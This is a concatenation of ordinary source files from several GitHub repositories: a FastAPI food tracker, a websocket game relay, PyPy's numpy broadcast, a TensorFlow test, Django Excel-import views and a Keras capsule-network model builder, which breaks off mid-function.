    conn.close()
    if not item:
        raise HTTPException(status_code=404, detail="Food item not found")
    # Row layout (CREATE TABLE order): 0 pk, 1 id, 2 food, 3 date_added,
    # 4 expiration_date, 5 notes, 6 update_time, 7 date_consumed, 8 location.
    days_old = (datetime.date.today() - item[3]).days
    days_left = (item[4] - datetime.date.today()).days
    # Bug fix: the original read date_consumed from item[6] (update_time)
    # and location from item[7] (date_consumed) — off by one versus the
    # table's column order used everywhere else in this module.
    food_item = FoodItem(id=item[1], food=item[2], date_added=item[3], days_old=days_old, days_left=days_left, expiration_date=item[4], notes=item[5], date_consumed=item[7], location=item[8])
    return templates.TemplateResponse("view.html", {"request": request, "item": food_item})
@app.get("/consumed_items/", response_class=HTMLResponse)
async def read_updated_items(request: Request, sort_by_expiration_date: bool = False):
    """Render the consumed-items page: latest revision of each consumed item."""
    conn = connect_to_db()
    cur = conn.cursor()
    # Same latest-revision join as get_food_items(), but selecting rows whose
    # date_consumed IS NOT NULL.  Fix: the base query used to end with ';',
    # so appending ORDER BY produced invalid SQL; the semicolon was dropped.
    query = """
    SELECT fi.pk, fi.id, fi.food, fi.date_added, fi.expiration_date, fi.notes, fi.update_time, fi.date_consumed, fi.location
    FROM food_items fi
    INNER JOIN (
        SELECT id, MAX(update_time) AS max_update_time
        FROM food_items
        GROUP BY id
    ) AS mfi ON fi.id = mfi.id AND fi.update_time = mfi.max_update_time
    WHERE fi.date_consumed IS NOT NULL
    """
    if sort_by_expiration_date:
        query += " ORDER BY fi.expiration_date"
    cur.execute(query)
    rows = cur.fetchall()
    cur.close()
    conn.close()
    food_items = [FoodItem(pk=row[0], id=row[1], food=row[2], date_added=row[3], expiration_date=row[4], notes=row[5], update_time=row[6], date_consumed=row[7], location=row[8]) for row in rows]
    return templates.TemplateResponse("consumed.html", {"request": request, "food_items": food_items})
@app.get("/{item_id}/")
async def handle_qr_scan(item_id: str):
    """Entry point for a scanned QR code: route to the view or update page.

    An active (not consumed) item goes to its read-only view; anything else
    (unknown id, or an already-consumed item) goes to the update form.
    """
    conn = connect_to_db()
    cursor = conn.cursor()
    cursor.execute("""
        SELECT * FROM food_items
        WHERE id = %s
        ORDER BY update_time DESC
        LIMIT 1
    """, (item_id,))
    item = cursor.fetchone()
    cursor.close()
    conn.close()
    # item[7] is date_consumed in the food_items column order.
    if item and item[7] is None:
        return RedirectResponse(url=f"/{item_id}/view/")
    else:
        # Unknown or consumed item: send the user to the form; the update
        # handler inserts the row once the form is submitted.
        return RedirectResponse(url=f"/{item_id}/update/")
@app.get("/{item_id}/consumed/")
async def add_consumed_date(item_id: str):
    """Mark an item as consumed by appending a new revision row."""
    conn = connect_to_db()
    cursor = conn.cursor()
    # Find the latest entry based on the "update_time" column for the item.
    cursor.execute("""
        SELECT * FROM food_items
        WHERE id = %s
        ORDER BY update_time DESC
        LIMIT 1
    """, (item_id,))
    item = cursor.fetchone()
    # Each edit is stored as a new row, so it gets a fresh primary key.
    item_pk = str(uuid4())
    if not item:
        # Fix: close the connection before raising (it used to leak here).
        cursor.close()
        conn.close()
        raise HTTPException(status_code=404, detail="Item not found")
    # Copy the latest revision, stamping both update_time and date_consumed.
    # Row layout: 0 pk, 1 id, 2 food, 3 date_added, 4 expiration_date,
    # 5 notes, 6 update_time, 7 date_consumed, 8 location.
    current_time = datetime.datetime.now()
    cursor.execute(
        "INSERT INTO food_items (pk, id, food, date_added, expiration_date, notes, update_time, date_consumed, location) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)",
        # Bug fix: location is column 8; the original passed item[7]
        # (date_consumed) as the location.
        (item_pk, item_id, item[2], item[3], item[4], item[5], current_time, current_time, item[8]),
    )
    conn.commit()
    cursor.close()
    conn.close()
    return RedirectResponse(url="/")
| ksindy/qrfood | qr_food_app/main.py | main.py | py | 9,400 | python | en | code | 0 | github-code | 36 |
26415954202 | # This file runs the websockets.
import string, cgi, time
import sys
sys.path.insert(0, 'PyWebPlug')
from wsserver import *
from time import sleep
def setupMessages():
    """Placeholder hook for registering message handlers; does nothing."""
    return None
class Client:
    """A connected player socket that relays its traffic to a Host."""
    def __init__(self, socket):
        self.socket = socket
        # Until the first message arrives we don't know whether this client
        # wants to host a game or join an existing one.
        self.needsConfirmation = True
    def handle(self):
        """Read pending data and either pair with a host or forward to it."""
        if (self.socket):
            try:
                data = self.socket.readRaw()
            except Exception:
                # Bug fix: on a read failure `data` was left unbound and the
                # code below raised NameError; drop the socket and bail out.
                self.socket = None
                return
            if len(data) == 0:
                return
            print("Data:", data)
            if self.needsConfirmation:
                # First message: characters 3-6 carry the requested host code.
                code = data[3:7]
                if code == "0000":
                    print("Becoming a host!")
                    self.becomeHost()
                else:
                    print("Trying to find host", code)
                    self.host = findHost(code)
                    if self.host:
                        print("Found host.")
                        self.confirm()
                    else:
                        print("No host found.")
            else:
                # Already paired: forward raw data to the host, dropping the
                # host socket on failure.
                if self.host.socket:
                    try:
                        self.host.socket.send(data)
                    except Exception:
                        self.host.socket = None
                        print("Host's socket is closed.")
    # This is called to confirm to the client that they have been accepted,
    # after they send us their details.
    def confirm(self):
        self.pID = self.host.getNextpID()
        self.host.players[self.pID] = self
        self.needsConfirmation = False
        self.sID = extend(self.pID, 2)
        # "999": our id to the client; "998": new-player notice to the host.
        self.socket.send("999" + self.sID)
        self.host.socket.send("998" + self.sID)
    def becomeHost(self):
        """Promote this client to a Host with a fresh join code."""
        host = Host(self.socket, newHostCode())
        clients.remove(self)
        hosts.append(host)
    def disconnect(self):
        print("Lost client...")
        clients.remove(self)
        self.socket = None
        return
class Host:
    """A game host: owns a join code and fans messages out to its players.

    Wire format from the host: two-digit target player id, payload, then a
    "*" terminator (the parser skips one extra character after it).
    """
    def __init__(self, socket, hostCode):
        self.socket = socket
        self.hostCode = hostCode
        self.players = {}       # pID -> Client
        self.pID = 0            # last player id handed out
        # "999" + code tells the host its join code.
        self.socket.send("999" + str(self.hostCode))
        self.writingTo = 0      # player id currently being addressed (0 = none)
        self.data = ""          # receive buffer; messages may arrive split
    def getNextpID(self):
        # Hand out sequential player ids starting at 1.
        self.pID += 1
        return self.pID
    def handle(self):
        """Consume one framed message from the buffer and relay its payload."""
        if (self.socket):
            try:
                self.data += self.socket.readRaw()
            except:
                # NOTE(review): after a failed read the code continues with
                # whatever is already buffered — confirm that is intended.
                self.socket = None
            if len(self.data) == 0:
                return
            print("Host says: "+self.data)
            # "*" terminates a frame; wait for more data until one arrives.
            ind = self.data.find("*")
            if (ind < 0):
                return
            if self.writingTo == 0:
                try:
                    # First two characters are the target player id.
                    self.writingTo = int(self.data[0:2])
                except:
                    # Malformed header: drop one character and re-parse.
                    self.data = self.data[1:]
                    self.handle()
                    return;
            pID = self.writingTo
            # NOTE(review): self.players[pID] raises KeyError for an unknown
            # id before the else-branch warning can fire — verify.
            if self.players[pID]:
                if self.players[pID].socket:
                    try:
                        # Payload sits between the 2-char header and the "*".
                        self.players[pID].socket.send(self.data[2:ind])
                    except:
                        self.players[pID].socket = None;
                        print("Client's socket closed.")
            else:
                print("Host", self.hostCode," tried to send a messaged to non-existant player", pID)
            # Drop the consumed frame (terminator plus one extra character).
            self.data = self.data[ind+2:]
            self.writingTo = 0
    def disconnect(self):
        print("Lost host.")
        hosts.remove(self)
        self.socket = None
        return
def findHost(code):
    """Return the Host with the given join code, or None if none matches."""
    return next((host for host in hosts if host.hostCode == code), None)
def newHostCode():
    """Generate a 4-letter uppercase join code not used by any current host."""
    chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    # random.choice is the idiomatic equivalent of chars[int(random.random()*26)].
    code = ''.join(random.choice(chars) for _ in range(4))
    if findHost(code):
        # Collision with an existing host: try again.
        return newHostCode()
    return code
def extend(v, l):
    """Left-pad the string form of *v* with zeros to at least *l* characters."""
    return str(v).rjust(l, "0")
def handle(socket):
    """Wrap a newly accepted socket in a Client and start tracking it."""
    clients.append(Client(socket))
def main():
    """Run the relay server loop until interrupted with Ctrl-C."""
    # NOTE(review): gameStarted and stage are declared global but never
    # assigned or read in this module — likely leftovers; confirm.
    global gameStarted
    global stage
    try:
        setupMessages()
        server = startServer()
        while True:
            # Accept at most one new connection per tick, then pump every
            # client and host handler.
            newClient = handleNetwork()
            if newClient:
                handle(newClient)
            for client in clients:
                client.handle()
            for host in hosts:
                host.handle()
            # Small sleep to avoid busy-spinning the CPU.
            sleep(0.01)
    except KeyboardInterrupt:
        print(' received, closing server.')
        server.close()
# Module-level registries of live connections; mutated by Client/Host methods.
clients = []
hosts = []
# NOTE(review): this module-level pID is shadowed by Host.pID and appears unused.
pID = 0
if __name__ == '__main__':
    main()
| ChrisFadden/PartyTowers | webrouter.py | webrouter.py | py | 4,597 | python | en | code | 1 | github-code | 36 |
43298706244 | import pypy.module.micronumpy.constants as NPY
from nditer import ConcreteIter, parse_op_flag, parse_op_arg
from pypy.interpreter.error import OperationError, oefmt
from pypy.interpreter.gateway import interp2app
from pypy.interpreter.typedef import TypeDef, GetSetProperty
from pypy.module.micronumpy import support
from pypy.module.micronumpy.base import W_NDimArray, convert_to_array, W_NumpyObject
from rpython.rlib import jit
from strides import calculate_broadcast_strides, shape_agreement_multiple
def descr_new_broadcast(space, w_subtype, __args__):
    # Applevel constructor for numpy.broadcast: forward the positional
    # arguments straight to W_Broadcast.
    return W_Broadcast(space, __args__.arguments_w)
class W_Broadcast(W_NumpyObject):
    """
    Implementation of numpy.broadcast.
    This class is a simplified version of nditer.W_NDIter with fixed iteration for broadcasted arrays.
    """
    def __init__(self, space, args):
        # numpy.broadcast requires between 2 and NPY.MAXARGS operands.
        num_args = len(args)
        if not (2 <= num_args <= NPY.MAXARGS):
            raise oefmt(space.w_ValueError,
                        "Need at least two and fewer than (%d) array objects.", NPY.MAXARGS)
        self.seq = [convert_to_array(space, w_elem)
                    for w_elem in args]
        self.op_flags = parse_op_arg(space, 'op_flags', space.w_None,
                                     len(self.seq), parse_op_flag)
        # Broadcast shape common to all operands.
        self.shape = shape_agreement_multiple(space, self.seq, shape=None)
        self.order = NPY.CORDER
        self.iters = []
        self.index = 0
        try:
            self.size = support.product_check(self.shape)
        except OverflowError as e:
            raise oefmt(space.w_ValueError, "broadcast dimensions too large.")
        # One (iterator, iterator-state) pair per operand; the state is
        # advanced in lockstep by descr_next().
        for i in range(len(self.seq)):
            it = self.get_iter(space, i)
            it.contiguous = False
            self.iters.append((it, it.reset()))
        self.done = False
        pass
    def get_iter(self, space, i):
        # Build a ConcreteIter over operand i, broadcast to self.shape.
        arr = self.seq[i]
        imp = arr.implementation
        if arr.is_scalar():
            return ConcreteIter(imp, 1, [], [], [], self.op_flags[i], self)
        shape = self.shape
        backward = imp.order != self.order
        # r = (strides, backstrides) adjusted for broadcasting.
        r = calculate_broadcast_strides(imp.strides, imp.backstrides, imp.shape,
                                        shape, backward)
        iter_shape = shape
        if len(shape) != len(r[0]):
            # shape can be shorter when using an external loop, just return a view
            iter_shape = imp.shape
        return ConcreteIter(imp, imp.get_size(), iter_shape, r[0], r[1],
                            self.op_flags[i], self)
    def descr_iter(self, space):
        # __iter__: a broadcast object is its own iterator.
        return self
    def descr_get_shape(self, space):
        # .shape property: the broadcast shape as a tuple of ints.
        return space.newtuple([space.newint(i) for i in self.shape])
    def descr_get_size(self, space):
        # .size property: total number of elements in the broadcast result.
        return space.newint(self.size)
    def descr_get_index(self, space):
        # .index property: number of elements already yielded.
        return space.newint(self.index)
    def descr_get_numiter(self, space):
        # .numiter property: number of operand iterators.
        return space.newint(len(self.iters))
    @jit.unroll_safe
    def descr_next(self, space):
        # next(): yield a tuple with one element view per operand, advancing
        # all operand iterators together.
        if self.index >= self.size:
            self.done = True
            raise OperationError(space.w_StopIteration, space.w_None)
        self.index += 1
        res = []
        for i, (it, st) in enumerate(self.iters):
            res.append(self._get_item(it, st))
            self.iters[i] = (it, it.next(st))
        if len(res) < 2:
            return res[0]
        return space.newtuple(res)
    def _get_item(self, it, st):
        # Wrap the iterator's current operand view in a W_NDimArray.
        return W_NDimArray(it.getoperand(st))
# Applevel type object for numpy.broadcast, wiring the descr_* methods to the
# corresponding Python-level protocol slots and properties.
W_Broadcast.typedef = TypeDef("numpy.broadcast",
                              __new__=interp2app(descr_new_broadcast),
                              __iter__=interp2app(W_Broadcast.descr_iter),
                              next=interp2app(W_Broadcast.descr_next),
                              shape=GetSetProperty(W_Broadcast.descr_get_shape),
                              size=GetSetProperty(W_Broadcast.descr_get_size),
                              index=GetSetProperty(W_Broadcast.descr_get_index),
                              numiter=GetSetProperty(W_Broadcast.descr_get_numiter),
                              )
| mozillazg/pypy | pypy/module/micronumpy/broadcast.py | broadcast.py | py | 4,124 | python | en | code | 430 | github-code | 36 |
34087887942 | # def takeRGBValues():
# print("Enter the values of channels:")
# channel1 = int(input(
# "Enter the value of 1st Channel: "))
# channel2 = int(input(
# "Enter the value of 2nd Channel: "))
# channel3 = int(input(
# "Enter the value of 3rd Channel: "))
# return channel1, channel2, channel3
def takeRGBValues():
    """Prompt for three RGB channel values (0-255) and return them as bytes."""
    print("Enter the values of channels:")
    values = []
    channel_index = 1
    while channel_index <= 3:
        value = int(input(f"Enter the value of Channel {channel_index}: "))
        if not 0 <= value <= 255:
            raise ValueError("Channel values should be between 0 and 255")
        values.append(value)
        channel_index += 1
    print(values)
    return bytes(values)
# def takeLEDValue():
# print("Please enter the brightness you want: ")
# brightnessChannels = []
# for i in range(3):
# channel_value = int(input(f"Enter the value of Channel {i+1}: "))
# if channel_value < 0 or channel_value > 255:
# raise ValueError("Channel values should be between 0 and 255")
# brightnessChannels.append(channel_value)
# print(brightnessChannels)
# return bytes(brightnessChannels)
def takeLEDValue():
    """Prompt for a brightness level (0-255) and return it as a 3-byte payload."""
    print("Please enter the brightness you want: ")
    level = int(input("Enter the brightness value (0-255): "))
    if not 0 <= level <= 255:
        raise ValueError("Brightness value should be between 0 and 255")
    # Only the first byte carries the brightness; the trailing bytes are zero.
    return bytes([level, 0, 0])
18407340005 | import os
import tensorflow as tf
from smart_compose.utils import parsing_utils
from smart_compose.utils.parsing_utils import InputFtrType
from smart_compose.utils.testing.test_case import TestCase
class TestParsingUtils(TestCase):
    """Unit test for parsing_utils.py"""
    # Absolute tolerance for float comparisons.  NOTE(review): not referenced
    # by the tests below — presumably consumed by TestCase helpers; confirm.
    atol = 1e-3
    def testIterateItemsWithListVal(self):
        """Tests iterate_items_with_list_val"""
        # Scalar values are wrapped into single-element lists; list values
        # pass through unchanged.
        dct_lst = [{'a': 'a'},
                   {'a': ['a']}]
        expected_result_lst = [[('a', ['a'])],
                               [('a', ['a'])]]
        assert len(dct_lst) == len(expected_result_lst), 'Number of test data and result must match'
        for dct, expected_result in zip(dct_lst, expected_result_lst):
            self.assertCountEqual(expected_result, list(parsing_utils.iterate_items_with_list_val(dct)))
    def testGetFeatureTypes(self):
        """Tests get_feature_types() """
        self.assertCountEqual(
            [InputFtrType.TARGET_COLUMN_NAME],
            parsing_utils.get_feature_types())
    def testHparamsLoadAndSave(self):
        """Tests loading and saving of hparams"""
        # Round-trip: save to the resource dir, reload, compare, clean up.
        hparams = parsing_utils.HParams(a=1, b=2, c=[1, 2, 3])
        parsing_utils.save_hparams(self.resource_dir, hparams)
        loaded_hparams = parsing_utils.load_hparams(self.resource_dir)
        self.assertEqual(hparams, loaded_hparams)
        os.remove(parsing_utils._get_hparam_path(self.resource_dir))
    def testEstimateStepsPerEpoch(self):
        """Tests estimate_steps_per_epoch() """
        # With batch size 1, steps per epoch equals the record count.
        num_record = parsing_utils.estimate_steps_per_epoch(self.data_dir, 1)
        self.assertEqual(num_record, 40)
# Allow running this test module directly via the TensorFlow test runner.
if __name__ == '__main__':
    tf.test.main()
| linkedin/detext | test/smart_compose/utils/test_parsing_utils.py | test_parsing_utils.py | py | 1,685 | python | en | code | 1,249 | github-code | 36 |
74134918182 | from cmath import nan
import re
from types import NoneType
from django.shortcuts import render, redirect
from django.http import JsonResponse
from mensajeria.models import (
Archivos,
Destinatarios,
Personas,
Maestras,
Peticion,
Paises,
Areas,
Secciones,
Grupos
)
from mensajeria.forms import ArchivosForm
import os
from datetime import datetime
from django.conf import settings
import pandas as pd
import json
from django.http import HttpResponse
from openpyxl import Workbook
from rest_framework.generics import CreateAPIView, GenericAPIView
from ...mixins.base import ResponseMixin
from ...serializers.auth.signup_serializers import SignupSerializers
from ...serializers.auth.signin_serializers import SigninSerializers
from rest_framework.response import Response
from rest_framework import status
from django.shortcuts import render
from django.http import HttpResponse
from django.core.validators import validate_email
from django.core.exceptions import ValidationError
class Preparation(CreateAPIView, ResponseMixin):
serializer_class = SignupSerializers
def get_validar_numero(self, numero):
regex = r"\d{10}$"
return re.match(regex, numero) is not None
def get_binary_search(self, arr, target):
left, right = 0, len(arr) - 1
while left <= right:
mid = (left + right) // 2
if arr[mid] == target:
return mid
elif arr[mid] < target:
left = mid + 1
else:
right = mid - 1
return -1
def get_data_null(self, txt):
if txt is nan:
return ""
else:
return txt
def get_validar_campos(self, matriz):
return [
[str(x) if x is not None and not pd.isna(x) else "" for x in row]
for row in matriz
]
def get_pais(self, paises_validos, paises_codigo, pais):
try:
if pais == "Colombia":
pais_id = 39
codigo = paises_codigo[38]
else:
index = self.get_binary_search(paises_validos, pais)
if index != -1:
pais_id = index + 1
codigo = paises_codigo[index]
else:
pais_id = 39
codigo = paises_codigo[38]
except ValueError:
pais_id = 39
codigo = paises_codigo[38]
return pais_id, codigo
def post(self, request, *args, **kwargs):
try:
if "archivo_excel_area" in request.FILES:
archivo = request.FILES["archivo_excel_area"]
if archivo.name.endswith((".xls", ".xlsx")):
df = pd.read_excel(archivo, engine="openpyxl")
matriz = df.values.tolist()
errados = []
validos = []
validos_celular = []
duplicados = []
duplicados_add = []
duplicados_docu = []
num_validos = 0
num_duplicados = 0
num_errados = 0
personas_actuales = Personas.objects.all().order_by("telefonowhatsapp")
paises_actuales = Paises.objects.all().order_by("nombre")
paises_validos = []
paises_codigo = []
validos_actuales = []
documentos_actuales = []
for pais_list in paises_actuales:
paises_validos.append(pais_list.nombre)
paises_codigo.append(pais_list.codigo)
for persona in personas_actuales:
validos_actuales.append(persona.telefonowhatsapp)
documentos_actuales.append(persona.identificacion)
matriz_data = self.get_validar_campos(matriz)
for row in matriz_data:
nombre = row[0].strip()
segundo_nombre = row[1].strip()
apellido = row[2].strip()
segundo_apellido = row[3].strip()
celular = row[4].strip()
pais = row[5].strip()
documento = row[6].strip()
tipoidentificacion = row[7].strip()
fechanacimiento = row[8].strip()
ocupacion = row[9].strip()
area = row[10].strip()
seccion = row[11].strip()
grupo = row[12].strip()
pais_id, codigo = self.get_pais(paises_validos, paises_codigo, pais)
try:
fechanacimiento = datetime.strptime(
fechanacimiento, "%Y-%m-%d %H:%M:%S"
).date()
if fechanacimiento > datetime.now().date():
fechanacimiento = ""
except ValueError:
fechanacimiento = ""
if not isinstance(celular, str):
celular = str(celular)
documento = str(documento).rstrip(".0")
persona_new = {
"nombre": nombre,
"segundo_nombre": segundo_nombre,
"apellido": apellido,
"segundo_apellido": segundo_apellido,
"celular_whatsapp": celular,
"whatsapp_prefijo": codigo + celular,
"pais": pais_id,
"documento": documento,
"tipoidentificacion": tipoidentificacion,
"fechanacimiento": fechanacimiento,
"ocupacion": ocupacion,
"area": area,
"seccion": seccion,
"grupo": grupo,
"message": "",
}
if not self.get_validar_numero(persona_new["celular_whatsapp"]):
persona_new["message"] = "Numero de whatsapp invalido."
errados.append(persona_new)
num_errados = num_errados + 1
elif not self.get_validar_numero(persona_new["documento"]):
persona_new["message"] = "Numero de documento invalido."
errados.append(persona_new)
num_errados = num_errados + 1
else:
validos_celular.sort()
index_validos = self.get_binary_search(validos_celular, celular)
if index_validos != -1:
persona_new[
"message"
] = "Numero de whatsapp duplicado en el excel."
duplicados.append(persona_new)
num_duplicados = num_duplicados + 1
else:
index2 = self.get_binary_search(validos_actuales, celular)
if index2 != -1:
persona_new[
"message"
] = "Numero de whatsapp duplicado en la base de datos."
duplicados.append(persona_new)
num_duplicados = num_duplicados + 1
else:
persona_new["message"] = "Datos correctos."
validos_celular.append(celular)
validos.append(persona_new)
num_validos = num_validos + 1
data = {
"validos": {"count": num_validos, "data": validos},
"errados": {"count": num_errados, "data": errados},
"duplicados": {"count": num_duplicados, "data": duplicados},
}
self.data = data
else:
self.error = "Archivo no encontrado"
self.status = status.HTTP_400_BAD_REQUEST
except Exception as e:
self.error = str(e)
self.status = status.HTTP_400_BAD_REQUEST
return Response(self.response_obj)
class Save(CreateAPIView, ResponseMixin):
serializer_class = SignupSerializers
def post_add_person(self, data, user):
nueva_persona = Personas(
nombre=data["nombre"],
segundonombre=data["segundo_nombre"],
apellido=data["apellido"],
segundoapellido=data["segundo_apellido"],
telefonomovil=data["celular_llamada"],
telefonowhatsapp=data["celular_whatsapp"],
identificacion=data["documento"],
fechanacimiento=data["fechanacimiento"],
pais_id=data["pais_id"],
created_by=user,
)
nueva_persona.save()
persona_id = nueva_persona.id
nuevo_registro = Destinatarios(
persona_id=persona_id, created_by=user, estado_id=596, grupo_id = data["grupo_id"]
)
nuevo_registro.save()
return True
def get_binary_search(self, arr, target):
left, right = 0, len(arr) - 1
while left <= right:
mid = (left + right) // 2
if arr[mid] == target:
return mid
elif arr[mid] < target:
left = mid + 1
else:
right = mid - 1
return -1
def get_search(self, lista, valor):
try:
index = lista.index(valor)
return index
except ValueError:
return -1
def post(self, request, *args, **kwargs):
try:
personas = request.data["destinatarios"]
user = request.user
validos = []
num_validos = 0
invalidos = []
num_invalidos = 0
areas_actuales = Areas.objects.filter(estado_id=596).order_by("nombre")
secciones_actuales = Secciones.objects.filter(estado_id=596).order_by("nombre")
grupos_actuales = Grupos.objects.filter(estado_id=596).order_by("nombre")
areas_listado = []
areas_listado_id = []
secciones_listado = []
secciones_listado_id = []
grupos_listado = []
grupos_listado_id = []
grupos_listado_info = []
for area_list in areas_actuales:
areas_listado_id.append(area_list.id)
areas_listado.append(area_list.nombre)
for seccion_list in secciones_actuales:
secciones_listado_id.append(seccion_list.id)
secciones_listado.append(seccion_list.nombre)
for grupos_list in grupos_actuales:
grupos_listado_id.append(grupos_list.id)
grupos_listado.append(grupos_list.nombre)
areas_array = []
secciones_array = []
grupos_array = []
for row in personas:
index_validos = self.get_search(areas_listado, row['area'])
if index_validos != -1:
area_id = areas_listado_id[index_validos]
else:
areas_listado.append(row["area"])
new_area = Areas()
new_area.nombre = row["area"]
new_area.descripcion = ""
new_area.estado_id = 596
new_area.created_by = user
new_area.save()
area_id = new_area.id
areas_listado_id.append(area_id)
index_seccion = self.get_search(secciones_listado, row['seccion'])
if index_seccion != -1:
seccion_id = secciones_listado_id[index_seccion]
else:
secciones_listado.append(row['seccion'])
new_seccion = Secciones()
new_seccion.nombre = row['seccion']
new_seccion.area_id = area_id
new_seccion.descripcion = ""
new_seccion.estado_id = 596
new_seccion.created_by = user
new_seccion.save()
seccion_id = new_seccion.id
secciones_listado_id.append(seccion_id)
index_grupo = self.get_search(grupos_listado, row['grupo'])
if index_grupo != -1:
grupo_id = grupos_listado_id[index_grupo]
else:
grupos_listado.append(row['grupo'])
new_grupo = Grupos()
new_grupo.nombre = row['grupo']
new_grupo.seccion_id = seccion_id
new_grupo.descripcion = ""
new_grupo.estado_id = 596
new_grupo.created_by = user
new_grupo.save()
grupo_id = new_grupo.id
grupos_listado_id.append(grupo_id)
index_grupo = self.get_search(grupos_listado, row['grupo'])
if index_grupo != -1:
grupo_id = grupos_listado_id[index_grupo]
persona_new = {
"nombre": row["nombre"],
"segundo_nombre": row["segundo_nombre"],
"apellido": row["apellido"],
"segundo_apellido": row["segundo_apellido"],
"celular_whatsapp": row["whatsapp_prefijo"],
"celular_llamada": row["celular_whatsapp"],
"documento": row["documento"],
"fechanacimiento": row["fechanacimiento"],
"pais_id": row["pais"],
"grupo_id": grupo_id,
"seccion": row["seccion"],
"grupo": row["grupo"]
}
try:
self.post_add_person(persona_new, user)
validos.append(persona_new)
num_validos = num_validos + 1
except Exception as e:
invalidos.append(persona_new)
num_invalidos = num_invalidos + 1
data = {
"validos": {"count": num_validos, "data": validos},
"invalidos": {"count": num_invalidos, "data": invalidos},
"error": num_invalidos,
}
self.data = data
return Response(self.response_obj)
except Exception as e:
self.error = str(e)
self.status = status.HTTP_400_BAD_REQUEST
return Response(self.response_obj) | YilberthAndres/masivo | mensajeria/views/carga/carga_distribucion.py | carga_distribucion.py | py | 16,140 | python | es | code | 0 | github-code | 36 |
73421284263 |
import tensorflow as tf
import keras as K
from keras import callbacks, optimizers
from keras import backend as KB
from keras.engine import Layer
from keras.layers import Activation
from keras.layers import LeakyReLU, Dense, Input, Embedding, Dropout, Reshape, Concatenate, MaxPooling1D, Flatten
from keras.layers import Flatten, SpatialDropout1D, Conv1D
from keras.models import Model
from keras.utils import plot_model
from keras.models import Sequential
from keras.preprocessing import sequence
from keras.layers import Add
# capsule layers from Xifeng Guo
# https://github.com/XifengGuo/CapsNet-Keras
from capsulelayers import CapsuleLayer, PrimaryCap, PrimaryCap1D, Length, Mask
# Build the CapsNet model
def draw_capsnet_model(hyper_param, embedding_matrix=None, verbose=True):
"""
Input: hyper parameters dictionary
Construct:
input layers : x , x_pos(o), x_captialization(o)
embedding matrix : use_glove or randomly initialize
conv1 : first convolution layer
primarycaps : conv2 and squash function applied
ner_caps : make 8 ner capsules of specified dim
out_pred : calc length of 8 ner capsules as 8 prob. predictions over 8 ner classes
Returns:
if decoding/reconstruction disabled --> a single keras.models.Model object
if decoding/reconstruction enabled --> three keras.models.Model objects
"""
# input layer(s)
x = Input(shape=(hyper_param['maxlen'],), name='x')
if hyper_param['use_pos_tags'] :
x_pos = Input(shape=(hyper_param['maxlen'],hyper_param['poslen']), name='x_pos')
if hyper_param['use_capitalization_info'] :
x_capital = Input(shape=(hyper_param['maxlen'], hyper_param['capitallen']), name='x_capital')
# embedding matrix
if hyper_param['use_glove']:
embed = Embedding(hyper_param['max_features'], hyper_param['embed_dim'], weights=[embedding_matrix],\
input_length=hyper_param['maxlen'], trainable=hyper_param['allow_glove_retrain'])(x)
else:
embed = Embedding(hyper_param['max_features'], hyper_param['embed_dim'], input_length=hyper_param['maxlen'],\
embeddings_initializer="random_uniform" )(x)
# concat embeddings with additional features
if hyper_param['use_pos_tags'] and hyper_param['use_capitalization_info'] :
embed = Concatenate(axis=-1)([embed, x_pos, x_capital])
elif hyper_param['use_pos_tags'] and (not hyper_param['use_capitalization_info']) :
embed = Concatenate(axis=-1)([embed, x_pos])
elif (not hyper_param['use_pos_tags']) and hyper_param['use_capitalization_info'] :
embed = Concatenate(axis=-1)([embed, x_capital])
else :
embed = embed
# add dropout here
if hyper_param['embed_dropout'] > 0.0:
embed = SpatialDropout1D( hyper_param['embed_dropout'])(embed)
# feed embeddings into conv1
conv1 = Conv1D( filters=hyper_param['conv1_filters'], \
kernel_size=hyper_param['conv1_kernel_size'],\
strides=hyper_param['conv1_strides'], \
padding=hyper_param['conv1_padding'],\
activation='relu', name='conv1')(embed)
# make primary capsules
if hyper_param['use_2D_primarycaps']:
convShape = conv1.get_shape().as_list()
conv1 = Reshape(( convShape[1], convShape[2], 1))(conv1)
primaryCapLayer = PrimaryCap
else:
primaryCapLayer = PrimaryCap1D
# make primary capsules
primarycaps = primaryCapLayer(conv1, \
dim_capsule=hyper_param['primarycaps_dim_capsule'],\
n_channels=hyper_param['primarycaps_n_channels'],\
kernel_size=hyper_param['primarycaps_kernel_size'], \
strides=hyper_param['primarycaps_strides'], \
padding=hyper_param['primarycaps_padding'])
# make ner capsules
ner_caps = CapsuleLayer(num_capsule=hyper_param['ner_classes'], \
dim_capsule=hyper_param['ner_capsule_dim'], \
routings=hyper_param['num_dynamic_routing_passes'], \
name='nercaps')(primarycaps)
# replace each ner capsuel with its length
out_pred = Length(name='out_pred')(ner_caps)
if verbose:
print ("x", x.get_shape())
if hyper_param['use_pos_tags'] : print ("x_pos", x_pos.get_shape())
if hyper_param['use_capitalization_info'] : print ("x_capital", x_capital.get_shape())
print ("embed", embed.get_shape())
print ("conv1", conv1.get_shape())
print ("primarycaps", primarycaps.get_shape())
print ("ner_caps", ner_caps.get_shape())
print ("out_pred", out_pred.get_shape())
if hyper_param['use_decoder']:
decoder_y_cat = Input(shape=(hyper_param['ner_classes'],), name='decoder_y_cat')
masked_by_y = Mask(name='masked_by_y')([ner_caps, decoder_y_cat]) # true label is used to mask during training
masked = Mask()(ner_caps) # mask using capsule with maximal length for predicion
# decoder for training
train_decoder_dense1 = Dense(hyper_param['decoder_feed_forward_1'], activation='relu',\
input_dim=hyper_param['ner_capsule_dim']*hyper_param['ner_classes'],\
name='train_decoder_dense1')(masked_by_y)
train_decoder_dense1_dropout = Dropout(hyper_param['decoder_dropout'])(train_decoder_dense1)
train_decoder_dense2 = Dense(hyper_param['decoder_feed_forward_2'], activation='relu',\
name='train_decoder_dense2')(train_decoder_dense1_dropout)
train_decoder_dense2_dropout = Dropout(hyper_param['decoder_dropout'])(train_decoder_dense2)
train_decoder_output = Dense(hyper_param['embed_dim'], activation=None,\
name='train_decoder_output')(train_decoder_dense2_dropout)
# decoder for evaluation (prediction)
eval_decoder_dense1 = Dense(hyper_param['decoder_feed_forward_1'], activation='relu',\
input_dim=hyper_param['ner_capsule_dim']*hyper_param['ner_classes'],\
name='eval_decoder_dense1')(masked)
eval_decoder_dense2 = Dense(hyper_param['decoder_feed_forward_2'], activation='relu',\
name='eval_decoder_dense2')(eval_decoder_dense1)
eval_decoder_output = Dense(hyper_param['embed_dim'], activation=None,\
name='eval_decoder_output')(eval_decoder_dense2)
if verbose:
print ("Decoder model enabled for GloVe vector deconstruction...")
print ("decoder_y_cat", decoder_y_cat.get_shape())
